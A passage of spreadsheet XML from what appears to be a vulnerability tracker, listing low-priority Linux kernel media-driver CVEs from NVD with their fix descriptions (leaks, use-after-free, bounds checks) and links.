When stop_streaming is called, an infinite loop may occur in some cases.
Add a bounded poll of the queue status: loop until the queues drain,
sleeping briefly between polls, and bail out once VPU_DEC_STOP_TIMEOUT
elapses.</t>
        </is>
      </c>
      <c r="S1577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89868</t>
        </is>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89869</t>
        </is>
      </c>
      <c r="D1578" s="5" t="inlineStr"/>
      <c r="E1578" s="5" t="inlineStr"/>
      <c r="F1578" s="5" t="inlineStr"/>
      <c r="G1578" s="5" t="inlineStr"/>
      <c r="H1578" s="5" t="inlineStr"/>
      <c r="I1578" s="5" t="inlineStr"/>
      <c r="J1578" s="5" t="inlineStr"/>
      <c r="K1578" s="5" t="inlineStr"/>
      <c r="L1578" s="5" t="inlineStr"/>
      <c r="M1578" s="5" t="inlineStr"/>
      <c r="N1578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1578" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1578" s="5" t="inlineStr"/>
      <c r="Q1578" s="5" t="inlineStr"/>
      <c r="R1578" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: qcom: iris: use disable_irq() during power-off
The IRQ is registered as a threaded IRQ.
Using disable_irq_nosync() in iris_vpu_power_off() does not wait
for an already queued threaded IRQ handler to complete before
returning.
As a result, a threaded IRQ handler may still run after the VPU has
been powered down and access hardware registers after power-off.
Replace disable_irq_nosync() with disable_irq() so the power-off path
waits for any in-flight threaded IRQ handler to complete before
returning.</t>
        </is>
      </c>
      <c r="S1578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89869</t>
        </is>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89871</t>
        </is>
      </c>
      <c r="D1579" s="5" t="inlineStr"/>
      <c r="E1579" s="5" t="inlineStr"/>
      <c r="F1579" s="5" t="inlineStr"/>
      <c r="G1579" s="5" t="inlineStr"/>
      <c r="H1579" s="5" t="inlineStr"/>
      <c r="I1579" s="5" t="inlineStr"/>
      <c r="J1579" s="5" t="inlineStr"/>
      <c r="K1579" s="5" t="inlineStr"/>
      <c r="L1579" s="5" t="inlineStr"/>
      <c r="M1579" s="5" t="inlineStr"/>
      <c r="N1579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1579" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1579" s="5" t="inlineStr"/>
      <c r="Q1579" s="5" t="inlineStr"/>
      <c r="R1579" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: video-i2c: fix kthread error pointer left in kthread_vid_cap on failure
kthread_run() returns an ERR_PTR on failure, not NULL.
When start_streaming() fails, data-&gt;kthread_vid_cap is left holding
this error pointer instead of being cleared.
This causes two subsequent bugs:
1. A future call to start_streaming() sees a non-NULL kthread_vid_cap
   and returns 0 (success) immediately, without actually starting the
   capture thread.
2. A call to stop_streaming() checks 'kthread_vid_cap == NULL' which
   is false for an error pointer, and proceeds to call kthread_stop()
   on the error pointer, leading to a kernel crash.
Fix this by resetting kthread_vid_cap to NULL on failure before
jumping to the error path.</t>
        </is>
      </c>
      <c r="S1579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89871</t>
        </is>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89872</t>
        </is>
      </c>
      <c r="D1580" s="5" t="inlineStr"/>
      <c r="E1580" s="5" t="inlineStr"/>
      <c r="F1580" s="5" t="inlineStr"/>
      <c r="G1580" s="5" t="inlineStr"/>
      <c r="H1580" s="5" t="inlineStr"/>
      <c r="I1580" s="5" t="inlineStr"/>
      <c r="J1580" s="5" t="inlineStr"/>
      <c r="K1580" s="5" t="inlineStr"/>
      <c r="L1580" s="5" t="inlineStr"/>
      <c r="M1580" s="5" t="inlineStr"/>
      <c r="N1580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1580" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1580" s="5" t="inlineStr"/>
      <c r="Q1580" s="5" t="inlineStr"/>
      <c r="R1580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-fwnode: Fix fwnode leak in v4l2_fwnode_parse_link
In v4l2_fwnode_parse_link(), the remote endpoint fwnode reference is
acquired using fwnode_graph_get_remote_endpoint(). This reference is
properly released in the error paths, but it is leaked on the success
path.
Add the missing fwnode_handle_put() before returning 0 to prevent the
reference leak.
[Sakari Ailus: Fix subject prefix and coding style a little.]</t>
        </is>
      </c>
      <c r="S1580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89872</t>
        </is>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89874</t>
        </is>
      </c>
      <c r="D1581" s="5" t="inlineStr"/>
      <c r="E1581" s="5" t="inlineStr"/>
      <c r="F1581" s="5" t="inlineStr"/>
      <c r="G1581" s="5" t="inlineStr"/>
      <c r="H1581" s="5" t="inlineStr"/>
      <c r="I1581" s="5" t="inlineStr"/>
      <c r="J1581" s="5" t="inlineStr"/>
      <c r="K1581" s="5" t="inlineStr"/>
      <c r="L1581" s="5" t="inlineStr"/>
      <c r="M1581" s="5" t="inlineStr"/>
      <c r="N1581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1581" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1581" s="5" t="inlineStr"/>
      <c r="Q1581" s="5" t="inlineStr"/>
      <c r="R1581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-async: avoid deleting unlinked ASC entry on link error
v4l2_async_match_notify() creates ancillary media links before adding
asc-&gt;asc_subdev_entry to sd-&gt;asc_list.
If ancillary link creation fails, the function jumps to
err_call_unbind while asc_subdev_entry has not been linked yet. Async
connections are zero-allocated, so the list entry still has NULL next
and prev pointers on this path. Calling list_del() on it can therefore
dereference NULL instead of returning the original link creation error.
Do not delete asc_subdev_entry from err_call_unbind. There is no list
insertion to undo on this path; the bound callback and sub-device
registration are the operations that need to be rolled back.</t>
        </is>
      </c>
      <c r="S1581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89874</t>
        </is>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89876</t>
        </is>
      </c>
      <c r="D1582" s="5" t="inlineStr"/>
      <c r="E1582" s="5" t="inlineStr"/>
      <c r="F1582" s="5" t="inlineStr"/>
      <c r="G1582" s="5" t="inlineStr"/>
      <c r="H1582" s="5" t="inlineStr"/>
      <c r="I1582" s="5" t="inlineStr"/>
      <c r="J1582" s="5" t="inlineStr"/>
      <c r="K1582" s="5" t="inlineStr"/>
      <c r="L1582" s="5" t="inlineStr"/>
      <c r="M1582" s="5" t="inlineStr"/>
      <c r="N1582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1582" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1582" s="5" t="inlineStr"/>
      <c r="Q1582" s="5" t="inlineStr"/>
      <c r="R1582" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: tda18250: fix possible integer overflow
Integer overflow may occur, when variable exp equals to zero. Result
of shift 1 &lt;&lt; (exp - 1) may then leads to undefined behavior.</t>
        </is>
      </c>
      <c r="S1582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89876</t>
        </is>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89878</t>
        </is>
      </c>
      <c r="D1583" s="5" t="inlineStr"/>
      <c r="E1583" s="5" t="inlineStr"/>
      <c r="F1583" s="5" t="inlineStr"/>
      <c r="G1583" s="5" t="inlineStr"/>
      <c r="H1583" s="5" t="inlineStr"/>
      <c r="I1583" s="5" t="inlineStr"/>
      <c r="J1583" s="5" t="inlineStr"/>
      <c r="K1583" s="5" t="inlineStr"/>
      <c r="L1583" s="5" t="inlineStr"/>
      <c r="M1583" s="5" t="inlineStr"/>
      <c r="N1583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1583" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1583" s="5" t="inlineStr"/>
      <c r="Q1583" s="5" t="inlineStr"/>
      <c r="R1583" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: s2255: check firmware size before reading trailing marker
s2255_probe() reads a 4-byte marker and version from the last 8 bytes
of the firmware blob (fw-&gt;data[fw_size - 8] and [fw_size - 4]). If the
firmware file is shorter than 8 bytes, fw_size - 8 underflows and the
access reads out of bounds. Validate the firmware size before indexing.</t>
        </is>
      </c>
      <c r="S1583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89878</t>
        </is>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89879</t>
        </is>
      </c>
      <c r="D1584" s="5" t="inlineStr"/>
      <c r="E1584" s="5" t="inlineStr"/>
      <c r="F1584" s="5" t="inlineStr"/>
      <c r="G1584" s="5" t="inlineStr"/>
      <c r="H1584" s="5" t="inlineStr"/>
      <c r="I1584" s="5" t="inlineStr"/>
      <c r="J1584" s="5" t="inlineStr"/>
      <c r="K1584" s="5" t="inlineStr"/>
      <c r="L1584" s="5" t="inlineStr"/>
      <c r="M1584" s="5" t="inlineStr"/>
      <c r="N1584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1584" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1584" s="5" t="inlineStr"/>
      <c r="Q1584" s="5" t="inlineStr"/>
      <c r="R1584" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: s2255: bound JPEG frame size before copying into the buffer
s2255_fillbuff() memcpy()s vc-&gt;jpg_size bytes of a captured JPEG/MJPEG
frame into the vb2 plane.  vc-&gt;jpg_size is taken verbatim from the
S2255_MARKER_FRAME header the device sends (pdword[4] in save_frame())
and, unlike the frame payload length just above it, is never bounded:
	payload = le32_to_cpu(pdword[3]);
	if (payload &gt; vc-&gt;req_image_size)	/* payload is checked ... */
		return -EINVAL;
	vc-&gt;pkt_size = payload;
	vc-&gt;jpg_size = le32_to_cpu(pdword[4]);	/* ... jpg_size is not */
A malicious or malfunctioning device can therefore report a jpg_size
larger than the destination vb2 plane, and the memcpy() writes past it.
jpg_size is a signed int, so a value with the top bit set also turns
into a huge length.
Reject a frame whose jpg_size is negative or exceeds the plane size
before copying it.</t>
        </is>
      </c>
      <c r="S1584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89879</t>
        </is>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89881</t>
        </is>
      </c>
      <c r="D1585" s="5" t="inlineStr"/>
      <c r="E1585" s="5" t="inlineStr"/>
      <c r="F1585" s="5" t="inlineStr"/>
      <c r="G1585" s="5" t="inlineStr"/>
      <c r="H1585" s="5" t="inlineStr"/>
      <c r="I1585" s="5" t="inlineStr"/>
      <c r="J1585" s="5" t="inlineStr"/>
      <c r="K1585" s="5" t="inlineStr"/>
      <c r="L1585" s="5" t="inlineStr"/>
      <c r="M1585" s="5" t="inlineStr"/>
      <c r="N1585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1585" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1585" s="5" t="inlineStr"/>
      <c r="Q1585" s="5" t="inlineStr"/>
      <c r="R1585" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rtl2832_sdr: use vb2_video_unregister_device() on remove to fix DMA leak
rtl2832_sdr_remove() runs on USB disconnect and clears dev-&gt;udev to
NULL before any pending streaming teardown has run. When user space
later closes its file descriptor, vb2 calls rtl2832_sdr_stop_streaming()
which in turn calls rtl2832_sdr_free_stream_bufs(). That helper releases
each coherent buffer with:
    usb_free_coherent(dev-&gt;udev, dev-&gt;buf_size,
                      dev-&gt;buf_list[dev-&gt;buf_num],
                      dev-&gt;dma_addr[dev-&gt;buf_num]);
usb_free_coherent() returns immediately when its dev argument is NULL,
so every DMA stream buffer that was live at disconnect is silently
leaked. The URBs allocated in rtl2832_sdr_alloc_urbs() outlive the
device for the same reason.
The rtl2832_sdr driver uses vb2_fop_release() in its file_operations,
so replace video_unregister_device(&amp;dev-&gt;vdev) with
vb2_video_unregister_device(&amp;dev-&gt;vdev) and move it before clearing
dev-&gt;udev. vb2_video_unregister_device() releases the vb2 queue, which
synchronously runs rtl2832_sdr_stop_streaming() if streaming is active,
so URBs and coherent DMA stream buffers are freed while dev-&gt;udev is
still valid.
vb2_video_unregister_device() locks vdev-&gt;queue-&gt;lock (vb_queue_lock)
internally, and stop_streaming() locks v4l2_lock, so the previous outer
mutex_lock(&amp;dev-&gt;vb_queue_lock) / mutex_lock(&amp;dev-&gt;v4l2_lock) pair
around the unregister sequence would self-deadlock and has been removed.
A short v4l2_lock critical section around dev-&gt;udev = NULL remains so
any ioctl path that still holds the file descriptor sees coherent state.
Issue identified by automated review of the INV-003 series at
https://sashiko.dev/</t>
        </is>
      </c>
      <c r="S1585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89881</t>
        </is>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89884</t>
        </is>
      </c>
      <c r="D1586" s="5" t="inlineStr"/>
      <c r="E1586" s="5" t="inlineStr"/>
      <c r="F1586" s="5" t="inlineStr"/>
      <c r="G1586" s="5" t="inlineStr"/>
      <c r="H1586" s="5" t="inlineStr"/>
      <c r="I1586" s="5" t="inlineStr"/>
      <c r="J1586" s="5" t="inlineStr"/>
      <c r="K1586" s="5" t="inlineStr"/>
      <c r="L1586" s="5" t="inlineStr"/>
      <c r="M1586" s="5" t="inlineStr"/>
      <c r="N1586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1586" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1586" s="5" t="inlineStr"/>
      <c r="Q1586" s="5" t="inlineStr"/>
      <c r="R1586" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: platform: mtk-mdp3: fix NULL deref on failed SCP lookup
Add the missing sanity check after looking up the SCP to avoid
dereferencing a NULL-pointer in case its driver has not yet been bound.</t>
        </is>
      </c>
      <c r="S1586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89884</t>
        </is>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89886</t>
        </is>
      </c>
      <c r="D1587" s="5" t="inlineStr"/>
      <c r="E1587" s="5" t="inlineStr"/>
      <c r="F1587" s="5" t="inlineStr"/>
      <c r="G1587" s="5" t="inlineStr"/>
      <c r="H1587" s="5" t="inlineStr"/>
      <c r="I1587" s="5" t="inlineStr"/>
      <c r="J1587" s="5" t="inlineStr"/>
      <c r="K1587" s="5" t="inlineStr"/>
      <c r="L1587" s="5" t="inlineStr"/>
      <c r="M1587" s="5" t="inlineStr"/>
      <c r="N1587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1587" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1587" s="5" t="inlineStr"/>
      <c r="Q1587" s="5" t="inlineStr"/>
      <c r="R1587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: intel/ipu6: fix async notifier cleanup leak on parse error
isys_notifier_init() calls v4l2_async_nf_init() and then adds fwnode
remote subdevs in a loop with v4l2_async_nf_add_fwnode_remote(). If an
endpoint parse or add fails partway through the loop, it jumps to
err_parse and returns without calling v4l2_async_nf_cleanup(), leaking
every v4l2_async_connection already added to the notifier's waiting
list.
The register-failure path just below already cleans up correctly, and
the caller only tears the notifier down (isys_notifier_cleanup()) once
isys_notifier_init() has returned success. Clean up the notifier on the
parse error path too.</t>
        </is>
      </c>
      <c r="S1587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89886</t>
        </is>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89889</t>
        </is>
      </c>
      <c r="D1588" s="5" t="inlineStr"/>
      <c r="E1588" s="5" t="inlineStr"/>
      <c r="F1588" s="5" t="inlineStr"/>
      <c r="G1588" s="5" t="inlineStr"/>
      <c r="H1588" s="5" t="inlineStr"/>
      <c r="I1588" s="5" t="inlineStr"/>
      <c r="J1588" s="5" t="inlineStr"/>
      <c r="K1588" s="5" t="inlineStr"/>
      <c r="L1588" s="5" t="inlineStr"/>
      <c r="M1588" s="5" t="inlineStr"/>
      <c r="N1588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1588" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1588" s="5" t="inlineStr"/>
      <c r="Q1588" s="5" t="inlineStr"/>
      <c r="R1588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: i2c: imx415: Release runtime PM reference on VBLANK error
The VBLANK path returned immediately when programming VMAX failed after
pm_runtime_get_if_in_use() had taken a runtime PM reference. Break out of
the switch instead so the common pm_runtime_put() path is used.</t>
        </is>
      </c>
      <c r="S1588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89889</t>
        </is>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89891</t>
        </is>
      </c>
      <c r="D1589" s="5" t="inlineStr"/>
      <c r="E1589" s="5" t="inlineStr"/>
      <c r="F1589" s="5" t="inlineStr"/>
      <c r="G1589" s="5" t="inlineStr"/>
      <c r="H1589" s="5" t="inlineStr"/>
      <c r="I1589" s="5" t="inlineStr"/>
      <c r="J1589" s="5" t="inlineStr"/>
      <c r="K1589" s="5" t="inlineStr"/>
      <c r="L1589" s="5" t="inlineStr"/>
      <c r="M1589" s="5" t="inlineStr"/>
      <c r="N1589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1589" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1589" s="5" t="inlineStr"/>
      <c r="Q1589" s="5" t="inlineStr"/>
      <c r="R1589" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: em28xx: fix use-after-free of dev_next-&gt;devlist on disconnect
When a device with has_dual_ts=1 is probed and the is_audio_only path
is taken, both dev and dev-&gt;dev_next are added to the global
em28xx_devlist via em28xx_init_extension(). However, during disconnect,
em28xx_close_extension(dev) only calls list_del(&amp;dev-&gt;devlist), leaving
dev-&gt;dev_next-&gt;devlist still linked in the global list. When dev_next is
subsequently freed via kref_put(), its devlist entry becomes a dangling
pointer in em28xx_devlist. The next device probe that calls
em28xx_init_extension() triggers a list corruption BUG when list_add_tail
detects the freed node.
This bug was exposed by commit a368ecde8a50 ("USB: core: Fix duplicate
endpoint bug by clearing reserved bits in the descriptor") which clears
reserved bits in bEndpointAddress during endpoint parsing. This causes
fuzzed endpoint addresses like 0xf3 to be normalized to 0x83, which
em28xx interprets as a vendor audio endpoint, enabling the
is_audio_only + has_dual_ts code path that was previously unreachable
with such descriptors.
Fix this by removing dev-&gt;dev_next-&gt;devlist from the global list in
em28xx_close_extension() before the device is freed.</t>
        </is>
      </c>
      <c r="S1589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89891</t>
        </is>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89892</t>
        </is>
      </c>
      <c r="D1590" s="5" t="inlineStr"/>
      <c r="E1590" s="5" t="inlineStr"/>
      <c r="F1590" s="5" t="inlineStr"/>
      <c r="G1590" s="5" t="inlineStr"/>
      <c r="H1590" s="5" t="inlineStr"/>
      <c r="I1590" s="5" t="inlineStr"/>
      <c r="J1590" s="5" t="inlineStr"/>
      <c r="K1590" s="5" t="inlineStr"/>
      <c r="L1590" s="5" t="inlineStr"/>
      <c r="M1590" s="5" t="inlineStr"/>
      <c r="N1590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1590" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1590" s="5" t="inlineStr"/>
      <c r="Q1590" s="5" t="inlineStr"/>
      <c r="R1590" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: em28xx: defer audio-only extension registration
The audio-only path registers extensions while probing the primary device.
For a dual-TS board, this happens before dev_next is created. The duplicate
device inherits is_audio_only and is then independently inserted into
em28xx_devlist.
The list is intended to contain only primary devices: extension operations
reach the secondary device through dev_next. The independently linked
secondary can be freed during disconnect while its list node remains
reachable, resulting in a use-after-free.
Defer audio-only extension registration to the module-request work item. It
runs only after probing has completed construction of the optional
secondary device, so only the primary is registered and extension callbacks
reach the secondary through dev_next.</t>
        </is>
      </c>
      <c r="S1590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89892</t>
        </is>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89895</t>
        </is>
      </c>
      <c r="D1591" s="5" t="inlineStr"/>
      <c r="E1591" s="5" t="inlineStr"/>
      <c r="F1591" s="5" t="inlineStr"/>
      <c r="G1591" s="5" t="inlineStr"/>
      <c r="H1591" s="5" t="inlineStr"/>
      <c r="I1591" s="5" t="inlineStr"/>
      <c r="J1591" s="5" t="inlineStr"/>
      <c r="K1591" s="5" t="inlineStr"/>
      <c r="L1591" s="5" t="inlineStr"/>
      <c r="M1591" s="5" t="inlineStr"/>
      <c r="N1591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1591" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1591" s="5" t="inlineStr"/>
      <c r="Q1591" s="5" t="inlineStr"/>
      <c r="R1591" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cobalt: Avoid freeing ALSA private data twice
snd_cobalt_card_create() stores cobsc in sc-&gt;private_data and installs
snd_cobalt_card_private_free() as sc-&gt;private_free. From that point,
snd_card_free(sc) releases cobsc through the ALSA card cleanup path.
If cobalt_alsa_init() fails after snd_cobalt_card_create(), the
err_exit_free path calls snd_card_free(sc) and then kfree(cobsc). That
second free releases the same object again.
Remove the explicit kfree(cobsc) and leave ownership with the ALSA card.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="S1591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89895</t>
        </is>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89896</t>
        </is>
      </c>
      <c r="D1592" s="5" t="inlineStr"/>
      <c r="E1592" s="5" t="inlineStr"/>
      <c r="F1592" s="5" t="inlineStr"/>
      <c r="G1592" s="5" t="inlineStr"/>
      <c r="H1592" s="5" t="inlineStr"/>
      <c r="I1592" s="5" t="inlineStr"/>
      <c r="J1592" s="5" t="inlineStr"/>
      <c r="K1592" s="5" t="inlineStr"/>
      <c r="L1592" s="5" t="inlineStr"/>
      <c r="M1592" s="5" t="inlineStr"/>
      <c r="N1592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1592" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1592" s="5" t="inlineStr"/>
      <c r="Q1592" s="5" t="inlineStr"/>
      <c r="R1592" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cedrus: fix memory leak in cedrus_init_ctrls()
In cedrus_init_ctrls(), the V4L2 control handler is initialized before
allocating memory for ctx-&gt;ctrls. If this allocation fails, the function
returns -ENOMEM without freeing the previously allocated handler
resources, leading to a memory leak.
Fix this by calling v4l2_ctrl_handler_free() on the ctx-&gt;ctrls allocation
failure path.
The bug was first flagged by an experimental analysis tool we are
developing for kernel memory-management bugs while analyzing
v6.13-rc1. The tool is still under development and is not yet publicly
available. Manual inspection confirms that the bug is still
present in v7.1.1.
An x86_64 allyesconfig build showed no new warnings. As we do not have an
Allwinner SoC or board with a Cedrus VPU available to test with, no
runtime testing was able to be performed.</t>
        </is>
      </c>
      <c r="S1592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89896</t>
        </is>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89900</t>
        </is>
      </c>
      <c r="D1593" s="5" t="inlineStr"/>
      <c r="E1593" s="5" t="inlineStr"/>
      <c r="F1593" s="5" t="inlineStr"/>
      <c r="G1593" s="5" t="inlineStr"/>
      <c r="H1593" s="5" t="inlineStr"/>
